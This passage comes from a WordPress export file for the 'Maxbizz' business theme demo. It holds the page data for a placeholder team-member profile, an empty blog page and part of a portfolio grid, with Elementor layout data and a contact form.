padding_tablet";i:2;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:5:{s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:2;s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:8;s:11:"member_name";i:7;s:12:"member_extra";i:6;s:12:"social_share";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:4;s:15:"_padding_mobile";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:8:"bg_color";i:3;}s:18:"style_text_section";a:2:{s:11:"title_color";i:3;s:6:"per_bg";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:3:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/single-team/</link>
		<pubDate>Thu, 10 Sep 2020 02:50:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=711</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="530" height="500" src="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-single-team.jpg 530w, https://maxbizz.s3.amazonaws.com/images/image1-single-team-300x283.jpg 300w" sizes="(max-width: 530px) 100vw, 530px" />											
			<h3>Peter Perish</h3>		
			<h6>chief business project</h6>		
		<ul><li>Department: Business Department</li><li>Experience: 15 Years</li><li>Email: perish.maxbizz@mail.com</li><li>Phone: +1-800-456-478-23</li><li>Fax: +1-800-456-478-24</li></ul>		
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
			<h5>My Biography</h5>		
		<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app a mobile app development company has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>My Soft & Hard Skills</h5>		
		<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.</p>		
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f736-o1" method="post" novalidate="novalidate">
<input type="hidden" name="_wpcf7" value="736" />
<input type="hidden" name="_wpcf7_version" value="5.2.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f736-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Contact Me</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send a message</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>711</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 02:50:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 02:50:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"b501399","elType":"section","settings":{"gap":"extended","padding":{"unit":"px","top":"90","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6365e43","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4b4c82c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","content_position":"middle","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[{"id":"fcac4d4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"98f528e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-single-team.jpg","id":713},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"1070f44","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"30","bottom":"30","left":"30","isLinked":false}},"elements":[{"id":"bfb6219","elType":"widget","settings":{"title":"Peter Perish","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"77b067d","elType":"widget","settings":{"title":"chief business project","header_size":"h6","title_color":"#FF8523","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e4d0805","elType":"widget","settings":{"editor":"<ul class=\"member-info\"><li><span class=\"text-dark\">Department:<\/span> Business Department<\/li><li><span class=\"text-dark\">Experience:<\/span> 15 Years<\/li><li><span class=\"text-dark\">Email: <\/span>perish.maxbizz@mail.com<\/li><li><span class=\"text-dark\">Phone: <\/span>+1-800-456-478-23<\/li><li><span class=\"text-dark\">Fax: <\/span>+1-800-456-478-24<\/li><\/ul>"},"elements":[],"widgetType":"text-editor"},{"id":"1453173","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4","align":"left"},"elements":[],"widgetType":"social-icons"}],"isInner":true}],"isInner":true},{"id":"a742530","elType":"widget","settings":{"title":"My Biography","header_size":"h5","_padding":{"unit":"px","top":"60","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"40","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ef6bdc8","elType":"widget","settings":{"editor":"<p>A vast majority of the app marketers mainly concentrate on the post-launch app marketing techniques and measures while completely missing on the pre-launch campaign. This prevents the app to create buzz and hype just around the time when the app is launched. As and when you launch the app, already a considerable number of people should expectantly look forward to your app and this requires long-drawn marketing efforts leading up to the app launch event. To create pre-launch buzz and hype about the app <span style=\"color: #ff8523;\">a mobile app development company<\/span> has an array of marketing options like social media campaign, search engine ads, video ads, email campaigns, etc. Apart from online options, you can also reach out to the wider audience with traditional marketing options like outdoor ads, print ads, media ads, and promotional events.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"984c88f","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"865ab3e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7bbffe7","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"da47a10","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a81434a","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"1541169","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"ca57b45","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c75fefb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bdf3219","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"17353e6","elType":"widget","settings":{"title":"My Soft & Hard Skills","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"318c138","elType":"widget","settings":{"editor":"<p>Just as a retail business in real life is remembered not just for its product offerings but also because of its services, support, and customer-friendliness, an app that offers a helpful customer support system for its valued users enjoy more traction and engagement than other apps. Great brands all over the globe enjoy appreciation and popularity because of their customer-friendly support and services.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2b3ff2b","elType":"widget","settings":{"cf7":"736","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"30","right":"20","bottom":"30","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:12:"width_tablet";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:7;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:7;s:19:"_inline_size_tablet";i:6;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"heading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:4;s:11:"header_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:2;s:3:"gap";i:3;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:3;s:7:"padding";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz/blog/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=768</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>768</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[770]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio-grid/</link>
		<pubDate>Fri, 11 Sep 2020 07:25:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=847</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-22'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-23'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-29'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-28'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-27'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1-100x100.jpg 100w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project2-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project2-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project2-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project2-100x100.jpg 100w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-3-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-4-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-4-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
